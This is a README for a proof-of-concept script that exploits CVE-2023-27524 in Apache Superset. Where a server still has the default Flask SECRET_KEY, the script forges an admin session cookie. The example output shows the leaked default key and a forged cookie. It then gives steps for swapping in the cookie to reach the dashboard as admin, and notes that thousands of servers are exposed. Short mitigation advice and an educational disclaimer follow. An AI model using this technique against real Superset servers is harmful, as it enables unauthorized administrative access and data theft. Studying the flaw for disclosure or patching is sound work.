# CVE-2023-27524: Apache Superset Auth Bypass
Script to check if an Apache Superset server is vulnerable to (CVE-2023-27524) and if it is vulnerable then, forge a session cookie with the `user_id = 1` which is usually the `admin`
user allowing for authentication bypass and gaining access to the dashboard. Currently, there are about 3000 servers world-wide running Apache Superset.

## Usage

usage: python3  --url URL 


## Basic Example

% python3 --url   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard

## Mitigations
Follow the [instructions here]( to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY]( so that existing database connection information is preserved.

## Disclaimer
This POC is created for educational purpose only

## Reference